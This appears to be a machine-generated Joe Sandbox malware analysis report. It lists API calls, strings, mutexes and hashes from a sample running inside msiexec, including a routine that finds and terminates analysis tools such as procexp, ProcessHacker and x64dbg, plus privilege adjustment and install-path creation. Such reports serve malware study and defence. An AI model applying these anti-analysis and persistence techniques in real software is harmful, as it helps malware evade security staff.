                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle$ProcessProcess32$CreateDeleteFirstNextOpenSleepSnapshotTerminateToolhelp32wcscmp
                                                                                                                                                                                                  • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                  • API String ID: 4011447834-928700279
                                                                                                                                                                                                  • Opcode ID: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction ID: 3c0c4f830e0e015253870ab6e71f142e3af9dcd28642c53f63a293335479336e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 214aab143e36c6a3a1886c25ccf32431eea88663dedd73175290a620f2c5ce1f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D5215320B1B54299EA04FF20E8911B862A0AF6C770F900531E4DDCA3F7DF2CAA09E641

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID: rbNSpGEsyb
                                                                                                                                                                                                  • API String ID: 299056699-189039185
                                                                                                                                                                                                  • Opcode ID: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction ID: f48cf8c61453818e8ba709d73e65a026bda4a62ad1943684e3cb858a9bef985f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c0b91fde05768c042ee2ac6d43adbd0a2db16a5cee25255770f8e6d070b9d3af
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5701A526A0EA4281E720DF11E85527D6770FB9CBB9F440131E9CECA775CF3DD985A600

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523744: GetWindowsDirectoryW.KERNEL32 ref: 00007FF63B523784
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523744: GetVolumeInformationW.KERNEL32 ref: 00007FF63B523801
                                                                                                                                                                                                    • Part of subcall function 00007FF63B523744: wsprintfW.USER32 ref: 00007FF63B5238A2
                                                                                                                                                                                                  • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B52390D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523922
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523935
                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523945
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B52396D
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523980
                                                                                                                                                                                                  • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523995
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Directory$CreateFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: .exe
                                                                                                                                                                                                  • API String ID: 943468954-4119554291
                                                                                                                                                                                                  • Opcode ID: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                  • Instruction ID: 1646a91c544e42d893665ce97dd043428f649edd51ed84ec4470bb297e5b9d4e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4d26158de2af8381748b2d04efe2df67fec403f4766650bccdbd64d4b22479f1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9811332172A98685DB60DF25F85476A6371FBD8B90F405031DACE87B3ADE3CD508DB00

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1083639309-0
                                                                                                                                                                                                  • Opcode ID: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction ID: 5833f118abf1cba26e76f4ea764b49aa034405b9ff33cbc972ffa173d3949b37
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d86f73275321031dd76b49c9948b61abcc843b1cbc31f42c8ec41072895b809
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5121BC31A0D98685E770DF11E84836A6370FBD8B64F004235D99E8A6B9DF3DD949EB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 299056699-0
                                                                                                                                                                                                  • Opcode ID: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction ID: 16665ae6cd5dda3edff3a5bd3a5560d8aa660d95ec0b5302ef820ecadff1ce6d
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8653a772b6c1b6a01af8be04a7d1a20e2c03a294286a54eab86cbb4ac1353a7c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B201C426A1DA8282E720DF21E85526E6370FBDCB65F400135E9CECA779CE3DD944A600
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                  • String ID: Unknown
                                                                                                                                                                                                  • API String ID: 4220601557-1654365787
                                                                                                                                                                                                  • Opcode ID: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction ID: a2807a2c0390a918f5f8ddebbdee264c904e145e9cb7070e252cf2848a6749c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: f2d689744fc7b439bf53b695258597b9eba8ab60145e53c7feb69784c68e6deb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC31A47661DAC485DB70DF19E4987AAA3A0F798B50F400225DACEC7B68DF3CD554DB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32wcscmp
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2850635065-0
                                                                                                                                                                                                  • Opcode ID: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction ID: 84e61c8879458198207fb198f24ebf65262b078f65a31a037f629ecf7b957a88
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63e5253a01a862d048e65b759e2ae1b9c40c069b321cf87a3327907f1e8bf356
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22110C71A0DA8682E774CF21E48836A63A0FBD8765F004335D6DD8A7A9DF3DD544EB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                  • String ID: %08lX%04lX%lu
                                                                                                                                                                                                  • API String ID: 3001812590-640692576
                                                                                                                                                                                                  • Opcode ID: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction ID: b6746c381f3018fb1e571b15f6645100bb3b4a32be37b19551172dd92f2f8841
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 740950ab7a4208dc5b437e8a53e5df2709b55f7c6f134fefe08efd8bb3628865
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7331E72661D5C18ADB20DF64E4983AAB3B0FB98710F401136E6CD8BA69DF7DC508DB00
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B52390D
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523922
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523935
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: CreateDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523945
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B52396D
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523980
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5238C4: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF63B523AA9), ref: 00007FF63B523995
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: GetCurrentProcess.KERNEL32 ref: 00007FF63B52414B
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: OpenProcessToken.ADVAPI32 ref: 00007FF63B52415E
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: LookupPrivilegeValueW.ADVAPI32 ref: 00007FF63B524186
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: AdjustTokenPrivileges.ADVAPI32 ref: 00007FF63B5241B1
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: CloseHandle.KERNEL32 ref: 00007FF63B5241BC
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: OpenProcess.KERNEL32 ref: 00007FF63B5241D1
                                                                                                                                                                                                    • Part of subcall function 00007FF63B5240E4: CloseHandle.KERNEL32 ref: 00007FF63B524249
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32 ref: 00007FF63B523037
                                                                                                                                                                                                  • HeapFree.KERNEL32 ref: 00007FF63B52304A
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000009.00000002.1439084024.00007FF63B521000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF63B520000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439040744.00007FF63B520000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439168323.00007FF63B525000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439194981.00007FF63B527000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439229739.00007FF63B528000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000009.00000002.1439266238.00007FF63B52A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_7ff63b520000_msiexec.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: lstrcat$Process$CloseHandleHeapOpenToken$AdjustCreateCurrentDirectoryFolderFreeLookupPathPrivilegePrivilegesValue
                                                                                                                                                                                                  • String ID: .x64$chFrWWdQWsLFevUr
                                                                                                                                                                                                  • API String ID: 3235591951-2286007224
                                                                                                                                                                                                  • Opcode ID: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction ID: 9dcd884d7ef1314b6a316632d8aa941a5dd123c4edfbc7fba8cb76fbd2d21773
                                                                                                                                                                                                  • Opcode Fuzzy Hash: cbab157b2d9c68e389ca682648b14c554c0f20e1364e44505b152457a58d70d4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1311D621A1AA8285EA10EF14E8453A977A0FB8C724F404135D5CCCB77ADF3CE559AB40

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:9.5%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:1.5%
                                                                                                                                                                                                  Total number of Nodes:2000
                                                                                                                                                                                                  Total number of Limit Nodes:30
                                                                                                                                                                                                  execution_graph 19760 7ff7102e09c0 19771 7ff7102e66f4 19760->19771 19772 7ff7102e6701 19771->19772 19773 7ff7102d9c58 __free_lconv_num 11 API calls 19772->19773 19774 7ff7102e671d 19772->19774 19773->19772 19775 7ff7102d9c58 __free_lconv_num 11 API calls 19774->19775 19776 7ff7102e09c9 19774->19776 19775->19774 19777 7ff7102df5e8 EnterCriticalSection 19776->19777 19105 7ff7102d4938 19106 7ff7102d496f 19105->19106 19107 7ff7102d4952 19105->19107 19106->19107 19108 7ff7102d4982 CreateFileW 19106->19108 19109 7ff7102d43d4 _fread_nolock 11 API calls 19107->19109 19110 7ff7102d49b6 19108->19110 19111 7ff7102d49ec 19108->19111 19112 7ff7102d4957 19109->19112 19130 7ff7102d4a8c GetFileType 19110->19130 19156 7ff7102d4f14 19111->19156 19115 7ff7102d43f4 _get_daylight 11 API calls 19112->19115 19118 7ff7102d495f 19115->19118 19123 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 19118->19123 19119 7ff7102d49e1 CloseHandle 19124 7ff7102d496a 19119->19124 19120 7ff7102d49cb CloseHandle 19120->19124 19121 7ff7102d49f5 19125 7ff7102d4368 _fread_nolock 11 API calls 19121->19125 19122 7ff7102d4a20 19177 7ff7102d4cd4 19122->19177 19123->19124 19129 7ff7102d49ff 19125->19129 19129->19124 19131 7ff7102d4b97 19130->19131 19132 7ff7102d4ada 19130->19132 19134 7ff7102d4b9f 19131->19134 19135 7ff7102d4bc1 19131->19135 19133 7ff7102d4b06 GetFileInformationByHandle 19132->19133 19136 7ff7102d4e10 21 API calls 19132->19136 19137 7ff7102d4b2f 19133->19137 19138 7ff7102d4bb2 GetLastError 19133->19138 19134->19138 19139 7ff7102d4ba3 19134->19139 19140 7ff7102d4be4 PeekNamedPipe 19135->19140 19154 7ff7102d4b82 19135->19154 19145 7ff7102d4af4 19136->19145 19141 7ff7102d4cd4 51 API calls 19137->19141 19143 7ff7102d4368 _fread_nolock 11 API calls 19138->19143 19142 7ff7102d43f4 _get_daylight 11 API calls 19139->19142 19140->19154 19146 7ff7102d4b3a 19141->19146 19142->19154 19143->19154 19144 7ff7102cb870 _log10_special 8 API calls 19147 7ff7102d49c4 19144->19147 19145->19133 19145->19154 19194 7ff7102d4c34 19146->19194 19147->19119 19147->19120 19150 7ff7102d4c34 10 API calls 19151 7ff7102d4b59 19150->19151 19152 7ff7102d4c34 10 API calls 19151->19152 19153 7ff7102d4b6a 19152->19153 19153->19154 19155 7ff7102d43f4 _get_daylight 11 API calls 19153->19155 19154->19144 19155->19154 19157 7ff7102d4f4a 19156->19157 19158 7ff7102d4fe2 __vcrt_freefls 19157->19158 19159 7ff7102d43f4 _get_daylight 11 API calls 19157->19159 19160 7ff7102cb870 _log10_special 8 API calls 19158->19160 19161 7ff7102d4f5c 19159->19161 19162 7ff7102d49f1 19160->19162 19163 7ff7102d43f4 _get_daylight 11 API calls 19161->19163 19162->19121 19162->19122 19164 7ff7102d4f64 19163->19164 19165 7ff7102d7118 45 API calls 19164->19165 19166 7ff7102d4f79 19165->19166 19167 7ff7102d4f81 19166->19167 19168 7ff7102d4f8b 19166->19168 19169 7ff7102d43f4 _get_daylight 11 API calls 19167->19169 19170 7ff7102d43f4 _get_daylight 11 API calls 19168->19170 19176 7ff7102d4f86 19169->19176 19171 7ff7102d4f90 19170->19171 19171->19158 19172 7ff7102d43f4 _get_daylight 11 API calls 19171->19172 19173 7ff7102d4f9a 19172->19173 19174 7ff7102d7118 45 API calls 19173->19174 19174->19176 19175 7ff7102d4fd4 GetDriveTypeW 19175->19158 19176->19158 19176->19175 19179 7ff7102d4cfc 19177->19179 19178 7ff7102d4a2d 19187 7ff7102d4e10 19178->19187 19179->19178 19201 7ff7102dea34 19179->19201 19181 7ff7102d4d90 19181->19178 19182 7ff7102dea34 51 API calls 19181->19182 19183 7ff7102d4da3 19182->19183 19183->19178 19184 7ff7102dea34 51 API calls 19183->19184 19185 7ff7102d4db6 19184->19185 19185->19178 19186 7ff7102dea34 51 API calls 19185->19186 19186->19178 19188 7ff7102d4e2a 19187->19188 19189 7ff7102d4e61 19188->19189 19190 7ff7102d4e3a 19188->19190 19191 7ff7102de8c8 21 API calls 19189->19191 19192 7ff7102d4368 _fread_nolock 11 API calls 19190->19192 19193 7ff7102d4e4a 19190->19193 19191->19193 19192->19193 19193->19129 19195 7ff7102d4c50 19194->19195 19196 7ff7102d4c5d FileTimeToSystemTime 19194->19196 19195->19196 19198 7ff7102d4c58 19195->19198 19197 7ff7102d4c71 SystemTimeToTzSpecificLocalTime 19196->19197 19196->19198 19197->19198 19199 7ff7102cb870 _log10_special 8 API calls 19198->19199 19200 7ff7102d4b49 19199->19200 19200->19150 19202 7ff7102dea41 19201->19202 19203 7ff7102dea65 19201->19203 19202->19203 19204 7ff7102dea46 19202->19204 19206 7ff7102dea9f 19203->19206 19207 7ff7102deabe 19203->19207 19205 7ff7102d43f4 _get_daylight 11 API calls 19204->19205 19208 7ff7102dea4b 19205->19208 19209 7ff7102d43f4 _get_daylight 11 API calls 19206->19209 19210 7ff7102d4178 45 API calls 19207->19210 19211 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 19208->19211 19212 7ff7102deaa4 19209->19212 19216 7ff7102deacb 19210->19216 19213 7ff7102dea56 19211->19213 19214 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 19212->19214 19213->19181 19215 7ff7102deaaf 19214->19215 19215->19181 19216->19215 19217 7ff7102df7ec 51 API calls 19216->19217 19217->19216 19382 7ff7102db830 19393 7ff7102df5e8 EnterCriticalSection 19382->19393 19398 7ff7102d4720 19399 7ff7102d472b 19398->19399 19407 7ff7102de5b4 19399->19407 19420 7ff7102df5e8 EnterCriticalSection 19407->19420 20048 7ff7102dec9c 20049 7ff7102dee8e 20048->20049 20053 7ff7102decde _isindst 20048->20053 20050 7ff7102d43f4 _get_daylight 11 API calls 20049->20050 20068 7ff7102dee7e 20050->20068 20051 7ff7102cb870 _log10_special 8 API calls 20052 7ff7102deea9 20051->20052 20053->20049 20054 7ff7102ded5e _isindst 20053->20054 20069 7ff7102e54a4 20054->20069 20059 7ff7102deeba 20061 7ff7102d9c10 _isindst 17 API calls 20059->20061 20062 7ff7102deece 20061->20062 20066 7ff7102dedbb 20066->20068 20094 7ff7102e54e8 20066->20094 20068->20051 20070 7ff7102e54b3 20069->20070 20071 7ff7102ded7c 20069->20071 20101 7ff7102df5e8 EnterCriticalSection 20070->20101 20076 7ff7102e48a8 20071->20076 20077 7ff7102e48b1 20076->20077 20078 7ff7102ded91 20076->20078 20079 7ff7102d43f4 _get_daylight 11 API calls 20077->20079 20078->20059 20082 7ff7102e48d8 20078->20082 20080 7ff7102e48b6 20079->20080 20081 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 20080->20081 20081->20078 20083 7ff7102e48e1 20082->20083 20084 7ff7102deda2 20082->20084 20085 7ff7102d43f4 _get_daylight 11 API calls 20083->20085 20084->20059 20088 7ff7102e4908 20084->20088 20086 7ff7102e48e6 20085->20086 20087 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 20086->20087 20087->20084 20089 7ff7102e4911 20088->20089 20093 7ff7102dedb3 20088->20093 20090 7ff7102d43f4 _get_daylight 11 API calls 20089->20090 20091 7ff7102e4916 20090->20091 20092 7ff7102d9bf0 _invalid_parameter_noinfo 37 API calls 20091->20092 20092->20093 20093->20059 20093->20066 20102 7ff7102df5e8 EnterCriticalSection 20094->20102 20104 7ff7102ea10e 20105 7ff7102ea11d 20104->20105 20106 7ff7102ea127 20104->20106 20108 7ff7102df648 LeaveCriticalSection 20105->20108 15755 7ff7102cae00 15756 7ff7102cae2e 15755->15756 15757 7ff7102cae15 15755->15757 15757->15756 15760 7ff7102dc90c 15757->15760 15761 7ff7102dc957 15760->15761 15765 7ff7102dc91b _get_daylight 15760->15765 15770 7ff7102d43f4 15761->15770 15763 7ff7102dc93e HeapAlloc 15764 7ff7102cae8e 15763->15764 15763->15765 15765->15761 15765->15763 15767 7ff7102e28a0 15765->15767 15773 7ff7102e28e0 15767->15773 15779 7ff7102da5d8 GetLastError 15770->15779 15772 7ff7102d43fd 15772->15764 15778 7ff7102df5e8 EnterCriticalSection 15773->15778 15780 7ff7102da619 FlsSetValue 15779->15780 15782 7ff7102da5fc 15779->15782 15781 7ff7102da62b 15780->15781 15793 7ff7102da609 SetLastError 15780->15793 15796 7ff7102ddea8 15781->15796 15782->15780 